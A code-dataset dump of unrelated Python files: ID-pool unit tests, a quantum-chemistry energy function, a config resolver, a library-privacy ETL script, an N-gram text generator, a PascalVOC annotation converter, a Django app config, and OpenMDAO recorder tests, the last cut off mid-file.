content
stringlengths 5
1.05M
|
---|
# Copyright 2017 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for _idpool module of the zhmcclient_mock package.
"""
from __future__ import absolute_import, print_function
import requests.packages.urllib3
import pytest
from zhmcclient_mock._idpool import IdPool
requests.packages.urllib3.disable_warnings()
class TestIdPool(object):
"""All tests for class IdPool."""
def test_init_error_1(self):
with pytest.raises(ValueError):
IdPool(7, 6)
def test_invalid_free_error_1(self):
pool = IdPool(5, 5)
with pytest.raises(ValueError):
pool.free(4) # not in range
with pytest.raises(ValueError):
pool.free(5) # in range but not allocated
with pytest.raises(ValueError):
pool.free(6) # not in range
def test_invalid_free_error_2(self):
pool = IdPool(5, 5)
pool.free_if_allocated(4) # not in range (= not allocated)
pool.free_if_allocated(5) # in range but not allocated
pool.free_if_allocated(6) # not in range (= not allocated)
def _test_exhausting_for_lo_hi(self, lowest, highest):
start = lowest
end = highest + 1
pool = IdPool(lowest, highest)
# Exhaust the pool
id_list = []
for i in range(start, end):
id = pool.alloc()
id_list.append(id)
# Verify uniqueness of the ID values
id_set = set(id_list)
assert len(id_set) == len(id_list)
# Verify that the pool is exhausted
with pytest.raises(ValueError):
pool.alloc()
def _test_free_for_lo_hi(self, lowest, highest):
start = lowest
end = highest + 1
pool = IdPool(lowest, highest)
# Exhaust the pool
id_list1 = []
for i in range(start, end):
id = pool.alloc()
id_list1.append(id)
# Return everything to the pool
for id in id_list1:
pool.free(id)
# Verify that nothing is used in the pool
assert len(pool._used) == 0
# Exhaust the pool
id_list2 = []
for i in range(start, end):
id = pool.alloc()
id_list2.append(id)
# Verify that the same ID values came back as last time
assert set(id_list1) == set(id_list2)
# Verify that the pool is exhausted
with pytest.raises(ValueError):
pool.alloc()
def _test_all_for_lo_hi(self, lowest, highest):
self._test_exhausting_for_lo_hi(lowest, highest)
self._test_free_for_lo_hi(lowest, highest)
def test_all(self):
# Knowing that the chunk size is 10, we focus on the sizes and range
# boundaries around that
self._test_all_for_lo_hi(0, 0)
self._test_all_for_lo_hi(0, 1)
self._test_all_for_lo_hi(0, 9)
self._test_all_for_lo_hi(0, 10)
self._test_all_for_lo_hi(0, 11)
self._test_all_for_lo_hi(0, 19)
self._test_all_for_lo_hi(0, 20)
self._test_all_for_lo_hi(0, 21)
self._test_all_for_lo_hi(3, 3)
self._test_all_for_lo_hi(3, 4)
self._test_all_for_lo_hi(3, 9)
self._test_all_for_lo_hi(3, 10)
self._test_all_for_lo_hi(3, 11)
self._test_all_for_lo_hi(3, 12)
self._test_all_for_lo_hi(3, 13)
self._test_all_for_lo_hi(3, 14)
self._test_all_for_lo_hi(9, 9)
self._test_all_for_lo_hi(9, 10)
self._test_all_for_lo_hi(9, 11)
self._test_all_for_lo_hi(9, 18)
self._test_all_for_lo_hi(9, 19)
self._test_all_for_lo_hi(9, 20)
self._test_all_for_lo_hi(10, 10)
self._test_all_for_lo_hi(10, 11)
self._test_all_for_lo_hi(10, 19)
self._test_all_for_lo_hi(10, 20)
self._test_all_for_lo_hi(10, 21)
self._test_all_for_lo_hi(11, 11)
self._test_all_for_lo_hi(11, 12)
self._test_all_for_lo_hi(11, 20)
self._test_all_for_lo_hi(11, 21)
self._test_all_for_lo_hi(11, 22)
|
#!/usr/bin/env python3
#
#Copyright 2022 Kurt R. Brorsen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def hf_energy(eri_ee_full, eri_ep_full, mo_fock_1e, mo_fock_1p, e_nocc, p_nocc):
e_hf = 0.0
for i in range(e_nocc):
e_hf += 2*mo_fock_1e[i,i]
for j in range(e_nocc):
e_hf += (2*eri_ee_full[i,i,j,j] - eri_ee_full[i,j,i,j])
# need to subtract this due to double counting by using ee and pp fock matrices
for j in range(p_nocc):
e_hf -= 2*eri_ep_full[i,i,j,j]
for i in range(p_nocc):
e_hf += mo_fock_1p[i,i]
return e_hf
|
import cas
import cas.common.utilities as utilities
import sys
import json
import multiprocessing
from collections.abc import Sequence, Mapping
from pathlib import Path
import simpleeval
import jsonschema
from dotmap import DotMap
def extend_validator_with_default(validator_class):
validate_properties = validator_class.VALIDATORS["properties"]
def set_defaults(validator, properties, instance, schema):
for property, subschema in properties.items():
if "default" in subschema:
instance.setdefault(property, subschema["default"])
for error in validate_properties(validator, properties, instance, schema):
yield error
return jsonschema.validators.extend(validator_class, {"properties": set_defaults})
DefaultValidatingDraft7Validator = extend_validator_with_default(
jsonschema.Draft7Validator
)
class DataResolverScope(Mapping):
def __init__(self):
self._data = DotMap()
def __getitem__(self, key):
if key not in self._data:
raise KeyError(key)
return self._data[key]
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def get_subsystem_output(self, subsystem: str, output: str):
return self._data.subsystems[subsystem].outputs[output]
def exclude_subsystem_input_files(self, subsystem: str, root: Path):
files = self.get_subsystem_output(subsystem, "files")
return utilities.rglob_invert(utilities.relative_paths(root, files))
class DataResolver:
"""
Class that actually does the configuration resolution
"""
def __init__(self, data: Mapping):
self._data = data
def build_eval_locals(self, parent: Mapping, scope: DataResolverScope) -> Mapping:
return DotMap(
{
"parent": parent,
"context": scope,
"path": self._data.path,
"args": self._data.args,
"assets": self._data.assets,
"subsystems": self._data.subsystems,
"env": {
"platform": sys.platform,
"cpu_count": multiprocessing.cpu_count(),
},
}
)
def _inject_config_str(self, config: str, eval_locals: Mapping) -> str:
"""
A terrible lexical parser for interpolated globals.
I.e. "build type: $(args.build)" returns "build type: trunk"
"""
prev = None
inblock = False
current = ""
result = ""
for c in config:
if c == "$":
prev = c
continue
if not inblock and c == "(" and prev == "$":
# read to end for key
inblock = True
elif inblock and c == ")":
value = utilities.get_dotpath_value(current, eval_locals)
if value is None:
raise Exception(
f"Value of configuration variable $({current}) was None"
)
result += str(value)
current = ""
inblock = False
elif inblock:
current += c
else:
result += c
prev = c
return result
def eval(self, condition: str, parent: Mapping, scope: DataResolverScope) -> bool:
# avoid infinite recusion
if isinstance(parent, LazyDynamicMapping):
parent = parent._data
eval_locals = self.build_eval_locals(parent, scope)
injected = self._inject_config_str(condition, eval_locals)
evaluator = simpleeval.EvalWithCompoundTypes(names=eval_locals)
result = evaluator.eval(injected)
# logging.debug(f'\"{cond}\" evaluated to: {result}')
return result
def resolve(self, config, scope: Mapping):
"""
Resolves the stored configuration into literal terms at runtime
"""
result = config
if isinstance(config, list):
result = []
for _, v in enumerate(config):
parsed = self.resolve(v, scope)
if not v or parsed is not None:
result.append(parsed)
elif isinstance(config, str):
result = self._inject_config_str(config, scope)
return result
class LazyDynamicBase:
"""
Base object that allows lazy resolution of configuration data
"""
def __init__(
self,
data=None,
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
self._data = data
self._resolver = resolver
self._scope = scope
self._parent = parent
self._transform_map = {list: LazyDynamicSequence, dict: LazyDynamicDotMap}
def _transform_object(self, data):
eval_locals = self._resolver.build_eval_locals(self, self._scope)
for k, v in self._transform_map.items():
if isinstance(data, k):
resolved = v(data, self._resolver, self._scope, self)
return resolved
return self._resolver.resolve(data, eval_locals)
class LazyDynamicSequence(LazyDynamicBase, Sequence):
"""
Lazy dynamic implementation of Sequence.
"""
def __init__(
self,
data: Sequence = [],
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
super().__init__(data, resolver, scope, parent)
def __getitem__(self, key):
return self._transform_object(self._data[key])
def __len__(self):
return len(self._data)
def with_scope(self, scope: DataResolverScope):
return LazyDynamicSequence(self._data, self._resolver, scope)
class LazyDynamicMapping(LazyDynamicBase, Mapping):
"""
Lazy dynamic implementation of Mapping.
"""
def __init__(
self,
data: Mapping = {},
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
super().__init__(data, resolver, scope, parent)
self._expressions = self._data.get("@expressions", {})
self._conditions = self._data.get("@conditions", {})
# strip special members and members that don't match conditions immediately
self._data = {k: v for k, v in self._data.items() if self._eval_condition(k)}
def _eval_condition(self, key: str):
if key in {"@expressions", "@conditions"}:
return False
condition = self._conditions.get(key)
if isinstance(condition, str) and not self._resolver.eval(
condition, self, self._scope
):
return False
return True
def _transform_kv(self, key: str, value):
"""
Evaluates @expressions and @conditions on a key
"""
expression = self._expressions.get(key)
if isinstance(expression, str):
value = self._resolver.eval(expression, self, self._scope)
return self._transform_object(value)
def __getitem__(self, key):
return self._transform_kv(key, self._data.get(key))
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def get(self, key, default=None):
result = self._data.get(key, default)
if result is None:
return None
return self._transform_kv(key, result)
def with_scope(self, scope: DataResolverScope):
return LazyDynamicMapping(self._data, self._resolver, scope)
class LazyDynamicDotMap(LazyDynamicMapping):
"""
Lazy dynamic implementation of DotMap.
"""
def __init__(
self,
data: Mapping = {},
resolver: DataResolver = None,
scope: DataResolverScope = None,
parent=None,
):
super().__init__(data, resolver, scope, parent)
dmap = DotMap()
dmap._map = self._data
self._data = dmap
def __getattr__(self, k):
if k in {
"_data",
"_resolver",
"_scope",
"_transform_map",
"_expressions",
"_conditionals",
"_dotmap",
}:
return super(self.__class__, self).__getattribute__(k)
return self._transform_kv(k, self._data.__getattr__(k))
def with_scope(self, scope):
return LazyDynamicDotMap(self._data, self._resolver, scope)
class ConfigurationUtilities:
@staticmethod
def parse_root_config(root: Path, config: dict) -> dict:
# validate the root schema
schema_path = Path(cas.__file__).parent.absolute().joinpath("schemas")
with open(schema_path.joinpath("root.json"), "r") as f:
root_schema = json.load(f)
DefaultValidatingDraft7Validator(root_schema).validate(config)
# validate all subsystem options
validators = {}
prefix = "cas.subsystems."
for k, subsystem in config["subsystems"].items():
if k in {"@conditions", "@expressions"}:
continue
module = subsystem.module
# validating third-party subsystems is not supported yet
if not module.startswith(prefix):
continue
sub_name = module[len(prefix) :]
if sub_name not in validators:
sub_path = schema_path.joinpath("subsystems", f"{sub_name}.json")
if not sub_path.exists():
raise Exception(f"unable to find schema for subsystem '{sub_name}'")
with open(sub_path, "r") as f:
validators[sub_name] = DefaultValidatingDraft7Validator(
json.load(f)
)
if subsystem.get("options") is None:
continue
validators[sub_name].validate(subsystem.options)
# setup the dotmap that we'll use to perform lazy resolution
config = DotMap(config)
config.path.root = root
config.path.content = root.joinpath("content")
config.path.game = root.joinpath("game")
config.path.src = root.joinpath("src")
config.path.devtools = config.path.src.joinpath("devtools")
config.path.secrets = config.path.devtools.joinpath("buildsys", "secrets")
config.path.vproject = config.path.game.joinpath(
config.options.project
).resolve()
# create the root resolver and the map
resolver = DataResolver(config)
return LazyDynamicDotMap(config.toDict(), resolver)
|
"""
project = "Protecting Patron Privacy on the Web: A Study of HTTPS and Google Analytics Implementation in Academic Library Websites"
name = "2_return_url_json.py",
version = "1.0",
author = "Patrick OBrien",
date = "07/25/2018"
author_email = "[email protected]",
description = ("Step 2 of 3: Extract, transform, and load data from result.json into a SQLite database needed to maintain traceability and de-duplication of pages returned by study population web servers."),
license = "[MIT license](https://opensource.org/licenses/mit-license.php)",
keywords = "IMLS Measuring Up, Digital Repositories, Research Library Privacy",
url = "https://github.com/imls-measuring-up/library-privacy",
"""
import json
import sqlite3
from urllib.parse import urlsplit
# read JSON Results
dir_name = '_data/2016-10-05T14:51:11.452293/'
file_json = dir_name + 'result.json'
json_string = open(file_json).read()
json_data = json.loads(str(json_string))
# connect to privacy DB
conn = sqlite3.connect('privacydb.sqlite')
cur = conn.cursor()
for call in json_data:
# read JSON file to update records with Return information
urlReturn = json_data[call]['pageRedirectEndURL'].strip().lower()
fileName = json_data[call]['filename'].strip()
requestUUID = fileName.split('.')[0]
scheme, host, path, query, fragment = urlsplit(urlReturn)
urlRootReturn = host + path + query + fragment
if scheme == 'http':
digCertReturn = 0
else:
digCertReturn = 1
cur.execute("SELECT id FROM UrlRequest WHERE requestUUID = ?",
(requestUUID,))
urlRequestID = cur.fetchone()[0]
# Insert results record from result.json
cur.execute('''
UPDATE UrlRequest
SET urlReturn = ?, urlRootReturn = ?, digCertReturn = ?
WHERE id = ?''',
(urlReturn, urlRootReturn, digCertReturn, urlRequestID,))
conn.commit()
|
from Organism.Organism import Organism
from Organism.Animal import *
from Organism.Plant import *
|
import sys
import json
import string
import random
POPULAR_NGRAM_COUNT = 10000
#Population is all the possible items that can be generated
population = ' ' + string.ascii_lowercase
def preprocess_frequencies(frequencies, order):
'''Compile simple mapping from N-grams to frequencies into data structures to help compute
the probability of state transitions to complete an N-gram
Arguments:
frequencies -- mapping from N-gram to frequency recorded in the training text
order -- The N in each N-gram (i.e. number of items)
Returns:
sequencer -- Set of mappings from each N-1 sequence to the freqency of possible
items completing it
popular_ngrams -- list of most common N-grams
'''
sequencer = {}
ngrams_sorted_by_freq = [
k for k in sorted(frequencies, key=frequencies.get, reverse=True)
]
popular_ngrams = ngrams_sorted_by_freq[:POPULAR_NGRAM_COUNT]
for ngram in frequencies:
#Separate the N-1 lead of each N-gram from its item completions
freq = frequencies[ngram]
lead = ngram[:-1]
final = ngram[-1]
sequencer.setdefault(lead, {})
sequencer[lead][final] = freq
return sequencer, popular_ngrams
def generate_letters(sequencer, popular_ngrams, length, order):
'''Generate text based on probabilities derived from statistics for initializing
and continuing sequences of letters
Arguments:
sequencer -- mapping from each leading sequence to frequencies of the next letter
popular_ngrams -- list of the highest frequency N-Grams
length -- approximate number of characters to generate before ending the program
order -- The N in each N-gram (i.e. number of items)
Returns:
nothing
'''
#The lead is the initial part of the N-Gram to be completed, of length N-1
#containing the last N-1 items produced
lead = ''
#Keep track of how many items have been generated
generated_count = 0
while generated_count < length:
#This condition will be true until the initial lead N-gram is constructed
#It will also be true if we get to a dead end where there are no stats
#For the next item from the current lead
if lead not in sequencer:
#Pick an N-gram at random from the most popular
reset = random.choice(popular_ngrams)
#Drop the final item so that lead is N-1
lead = reset[:-1]
for item in lead:
print(item, end='', flush=True)
generated_count += len(lead)
else:
freq = sequencer[lead]
weights = [ freq.get(c, 0) for c in population ]
chosen = random.choices(population, weights=weights)[0]
print(chosen, end='', flush=True)
#Clip the first item from the lead and tack on the new item
lead = lead[1:] + chosen
generated_count += 1
return
if __name__ == '__main__':
#File with N-gram frequencies is the first argument
raw_freq_fp = open(sys.argv[1])
length = int(sys.argv[2])
raw_freqs = json.load(raw_freq_fp)
#Figure out the N-gram order. Just pull the first N-gram and check its length
order = len(next(iter(raw_freqs)))
sequencer, popular_ngrams = preprocess_frequencies(raw_freqs, order)
generate_letters(sequencer, popular_ngrams, length, order)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from abc import ABC
import xml.etree.ElementTree as ET
import pandas as pd
import os
import re
import sys
import logging
# setup logger
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
from .operator import IOperator
class PascalVOC(IOperator, ABC):
""" Instance Object for pascal VOC annotation format """
def __init__(self, dataset):
super().__init__(dataset)
self._dataset = dataset
def extract(self, path: str):
""" extract annotation data when input the path to .xml files
:param path: string, relative / absolute path for annotation folder
:return:
"""
files_list = self.__extractFiles(path)
image_id = 0
img_list = []
tol_obj_list = []
for file in files_list:
img_data, obj_list = self.__FileReader(os.path.abspath(path) + os.sep + file)
image_id += 1
img_data.append(image_id)
obj_list = [i+[image_id] for i in obj_list]
img_list.append(img_data)
tol_obj_list.extend(obj_list)
if img_list:
img_df = pd.DataFrame.from_records(img_list, columns=['name', 'width', 'height','image_id'])
self.__updateDataset(img_df)
else:
logger.error("[var]: img_list is empty.")
sys.exit(1)
if obj_list and len(obj_list[0]) == 6:
obj_df = pd.DataFrame.from_records(tol_obj_list,
columns=['x_min', 'y_min', 'x_max', 'y_max', 'class', 'image_id'])
self.__DFRefiner(obj_df)
else:
logger.error(f"\n ERROR : obj_list has not many attrs. : {len(obj_list[0])} or obj_list is empty : {len(obj_list)}")
sys.exit(1)
def archive(self, location: str, data):
""" save pascalVOC annotation file in the given location
:param location: .xml file saving location
:param data: .xml daa bundle
:return:
"""
try:
tree_str = ET.tostring(data)
with open(location, 'wb') as pf:
pf.write(tree_str)
except Exception as error:
logger.exception(error)
sys.exit(1)
def translate(self):
""" translate common schema into json compatible format.
:return: none
"""
for index, row in self._dataset.iterrows():
ann_list = self.__filterImgObj(row['image_id'])
box = self.__xmlFormatter(row, ann_list)
if box:
yield box, row['name']
else:
yield None
def __extractFiles(self, path: str):
"""
:param path: relative or absolute directory to the annotation folder.
:return: return list of all .xml file names in given directory.
"""
if os.path.exists(path):
if not [x[1] for x in os.walk(path) if x[1] != []]:
path_list = [y[2] for y in os.walk(path) if y[2] != []][0]
if path_list:
xml_list = [n for n in path_list if n.split('.')[-1] == 'xml']
if xml_list:
return xml_list
else:
logger.error("\n ERROR : There are no .xml files in the given directory.")
sys.exit(1)
else:
logger.error("\n ERROR : The folder is empty.")
sys.exit(1)
else:
logger.error(f"\n ERROR : The entered path <{path}> is not valid.")
sys.exit(1)
def __DFRefiner(self, ann_df):
"""
create pd.DataFrame with columns of [ "obj_id", "image_id", "class_id", "x_min", "y_min", "x_max", "y_max" ] and
define self.annotations and self.classes
:param ann_df: pd.Dataframe with columns of [ 'x_min', 'y_min', 'x_max', 'y_max', 'class', 'image_id' ]
:return: None
"""
ann_df = ann_df.copy()
cats = list(ann_df.loc[:, "class"].unique())
n_cats = len(cats)
cat_series = pd.Series(range(1, n_cats + 1), index=cats)
ann_df["class_id"] = ann_df["class"].map(cat_series)
ann_df["obj_id"] = range(1,ann_df.shape[0]+1)
nw_df = ann_df.loc[:, ["obj_id", "image_id", "class_id", "x_min", "y_min", "x_max", "y_max"]]
super(PascalVOC, self).set_annotations(nw_df)
super(PascalVOC, self).set_classes(dict(zip(range(1,n_cats+1),cats)))
def __FileReader(self, file_path: str):
""" read individual xml files extract data, create pd.DataFrame files
:param file_path: absolute path to the single .xml file
:return: tuple of two list
img_data = [ filename, width, height ]
obj_list = [ class, xmin, ymin, xmax, ymax ]
"""
ann_tree = ET.parse(file_path)
ann_root = ann_tree.getroot()
try:
filename = self.__tagFilter(ann_root.find('filename').text)
size = ann_root.find('size')
width = int(size.find('width').text)
height = int(size.find('height').text)
img_data = [filename, width, height]
obj_list = []
for obj in ann_root.findall('object'):
obj_list.append(self.__get_voc_annotation_from_obj(obj))
except Exception as error:
logger.exception(error)
sys.exit(1)
return [img_data, obj_list]
def __get_voc_annotation_from_obj(self, obj):
""" read <object> block in xml file
:param obj: <object> block in the .xml file
:return: a list of object attrs. [ class, xmin, ymin, xmax, ymax ]
"""
try:
label = self.__tagFilter(obj.find('name').text)
bndbox = obj.find('bndbox')
xmin = int(bndbox.find('xmin').text)
ymin = int(bndbox.find('ymin').text)
xmax = int(bndbox.find('xmax').text)
ymax = int(bndbox.find('ymax').text)
ann = [xmin, ymin, xmax, ymax, label]
return ann
except Exception as error:
logger.exception(error)
sys.exit(1)
def __updateDataset(self, image_df):
"""
:param image_df: image attributes DataFrame
:return: merge current self.__dataset with image_df.
"""
partial_df = image_df.copy()
res_df = pd.merge(self._dataset, partial_df, on="name")
super(PascalVOC, self).set_dataset(res_df)
def __filterImgObj(self, img_id):
""" get row for specific image_id.
:param img_id: [int] image_id in the self.annotations
:return: all the row that carry given image_id as a list.
"""
filtered_list = self.annotations.loc[self.annotations["image_id"] == img_id, :].values.tolist()
return filtered_list
def __xmlFormatter(self, image_data, ann_data):
""" build the structure of the .xml file with data.
:param image_data: dictionary for data in self._dataset
:param ann_data: return values from self.__filterImgObj
:return: complete .xml object
"""
try:
ann = ET.Element("annotation")
ET.SubElement(ann, 'folder').text = image_data['folder']
ET.SubElement(ann, 'filename').text = image_data['name']
ET.SubElement(ann, 'path').text = image_data['path']
size = ET.SubElement(ann, 'size')
ET.SubElement(size, 'width').text = str(image_data['width'])
ET.SubElement(size, 'height').text = str(image_data['height'])
ET.SubElement(size, 'depth').text = str(3)
for line in ann_data:
obj = ET.SubElement(ann, 'object')
ET.SubElement(obj, 'name').text = self.classes[line[2]]
ET.SubElement(obj, 'pose').text = 'Unspecified'
ET.SubElement(obj, 'truncated').text = str(0)
ET.SubElement(obj, 'difficult').text = str(0)
bbox = ET.SubElement(obj, 'bndbox')
ET.SubElement(bbox, 'xmin').text = str(line[3])
ET.SubElement(bbox, 'ymin').text = str(line[4])
ET.SubElement(bbox, 'xmax').text = str(line[5])
ET.SubElement(bbox, 'ymax').text = str(line[6])
return ann
except Exception as error:
logger.exception(error)
sys.exit(1)
def __tagFilter(self,st: str):
s = re.sub(r'\t*\n*\r*', '', st)
return s
|
from django.apps import AppConfig
class WorkouttrackerConfig(AppConfig):
name = 'workouttracker'
|
""" Unit test for the SqliteRecorder. """
import errno
import os
from shutil import rmtree
from tempfile import mkdtemp
import time
import numpy as np
from sqlitedict import SqliteDict
from openmdao.core.problem import Problem
from openmdao.core.group import Group
from openmdao.core.parallel_group import ParallelGroup
from openmdao.core.component import Component
from openmdao.core.mpi_wrap import MPI
from openmdao.components.indep_var_comp import IndepVarComp
from openmdao.recorders.sqlite_recorder import SqliteRecorder
from openmdao.recorders.test.test_sqlite import _assertMetadataRecorded, _assertIterationDataRecorded
from openmdao.test.mpi_util import MPITestCase
if MPI:
from openmdao.core.petsc_impl import PetscImpl as impl
coordinate = [MPI.COMM_WORLD.rank, 'Driver', (1, )]
else:
from openmdao.core.basic_impl import BasicImpl as impl
coordinate = [0, 'Driver', (1, )]
class ABCDArrayComp(Component):
def __init__(self, arr_size=9, delay=0.01):
super(ABCDArrayComp, self).__init__()
self.add_param('a', np.ones(arr_size, float))
self.add_param('b', np.ones(arr_size, float))
self.add_param('in_string', '')
self.add_param('in_list', [])
self.add_output('c', np.ones(arr_size, float))
self.add_output('d', np.ones(arr_size, float))
self.add_output('out_string', '')
self.add_output('out_list', [])
self.delay = delay
def solve_nonlinear(self, params, unknowns, resids):
time.sleep(self.delay)
unknowns['c'] = params['a'] + params['b']
unknowns['d'] = params['a'] - params['b']
unknowns['out_string'] = params['in_string'] + '_' + self.name
unknowns['out_list'] = params['in_list'] + [1.5]
def run(problem):
t0 = time.time()
problem.run()
t1 = time.time()
return t0, t1
class TestSqliteRecorder(MPITestCase):
filename = ""
dir = ""
N_PROCS = 2
def setUp(self):
self.dir = mkdtemp()
self.filename = os.path.join(self.dir, "sqlite_test")
self.tablename_metadata = 'metadata'
self.tablename_iterations = 'iterations'
self.recorder = SqliteRecorder(self.filename)
self.recorder.options['record_metadata'] = False
self.eps = 1e-5
def tearDown(self):
try:
rmtree(self.dir)
except OSError as e:
# If directory already deleted, keep going
if e.errno not in (errno.ENOENT, errno.EACCES, errno.EPERM):
raise e
def assertMetadataRecorded(self, expected):
if self.comm.rank != 0:
return
db = SqliteDict(self.filename, self.tablename_metadata)
_assertMetadataRecorded(self, db, expected)
db.close()
def assertIterationDataRecorded(self, expected, tolerance, root):
if self.comm.rank != 0:
return
db = SqliteDict(self.filename, self.tablename_iterations)
_assertIterationDataRecorded(self, db, expected, tolerance)
db.close()
def test_basic(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("G1.P1.x", np.array([1.0, 1.0, 1.0])),
("G1.P2.x", np.array([2.0, 2.0, 2.0])),
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
("C1.out_string", "_C1"),
("C1.out_list", [1.5]),
]
expected_resids = [
("G1.P1.x", np.array([0.0, 0.0, 0.0])),
("G1.P2.x", np.array([0.0, 0.0, 0.0])),
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
("C1.out_string", ""),
("C1.out_list", []),
]
self.assertIterationDataRecorded(((coordinate, (t0, t1),
expected_params, expected_unknowns,
expected_resids),),
self.eps, prob.root)
def test_includes(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
self.recorder.options['includes'] = ['C1.*']
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
("C1.out_string", "_C1"),
("C1.out_list", [1.5]),
]
expected_resids = [
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
("C1.out_string", ""),
("C1.out_list", []),
]
self.assertIterationDataRecorded(((coordinate, (t0, t1), expected_params, expected_unknowns, expected_resids),), self.eps, prob.root)
def test_includes_and_excludes(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['includes'] = ['C1.*']
self.recorder.options['excludes'] = ['*.out*']
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
]
expected_resids = [
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
]
self.assertIterationDataRecorded(((coordinate, (t0, t1), expected_params, expected_unknowns, expected_resids),), self.eps, prob.root)
def test_solver_record(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.root.nl_solver.add_recorder(self.recorder)
self.recorder.options['record_params'] = True
self.recorder.options['record_resids'] = True
prob.setup(check=False)
t0, t1 = run(prob)
prob.cleanup()
if MPI:
coord = [MPI.COMM_WORLD.rank, 'Driver', (1, ), "root", (1,)]
else:
coord = [0, 'Driver', (1, ), "root", (1,)]
expected_params = [
("C1.a", [1.0, 1.0, 1.0]),
("C1.b", [2.0, 2.0, 2.0]),
]
expected_unknowns = [
("G1.P1.x", np.array([1.0, 1.0, 1.0])),
("G1.P2.x", np.array([2.0, 2.0, 2.0])),
("C1.c", np.array([3.0, 3.0, 3.0])),
("C1.d", np.array([-1.0, -1.0, -1.0])),
("C1.out_string", "_C1"),
("C1.out_list", [1.5]),
]
expected_resids = [
("G1.P1.x", np.array([0.0, 0.0, 0.0])),
("G1.P2.x", np.array([0.0, 0.0, 0.0])),
("C1.c", np.array([0.0, 0.0, 0.0])),
("C1.d", np.array([0.0, 0.0, 0.0])),
("C1.out_string", ""),
("C1.out_list", []),
]
self.assertIterationDataRecorded(((coord, (t0, t1), expected_params, expected_unknowns, expected_resids),), self.eps, prob.root)
def test_driver_records_metadata(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
prob.root.connect('G1.P1.x', 'C1.a')
prob.root.connect('G1.P2.x', 'C1.b')
prob.driver.add_recorder(self.recorder)
self.recorder.options['record_metadata'] = True
prob.setup(check=False)
prob.cleanup()
expected = (
list(prob.root.params.iteritems()),
list(prob.root.unknowns.iteritems()),
list(prob.root.resids.iteritems()),
)
self.assertMetadataRecorded(expected)
def test_driver_records_model_viewer_data(self):
size = 3
prob = Problem(Group(), impl=impl)
G1 = prob.root.add('G1', ParallelGroup())
G1.add('P1', IndepVarComp('x', np.ones(size, float) * 1.0))
G1.add('P2', IndepVarComp('x', np.ones(size, float) * 2.0))
prob.root.add('C1', ABCDArrayComp(size))
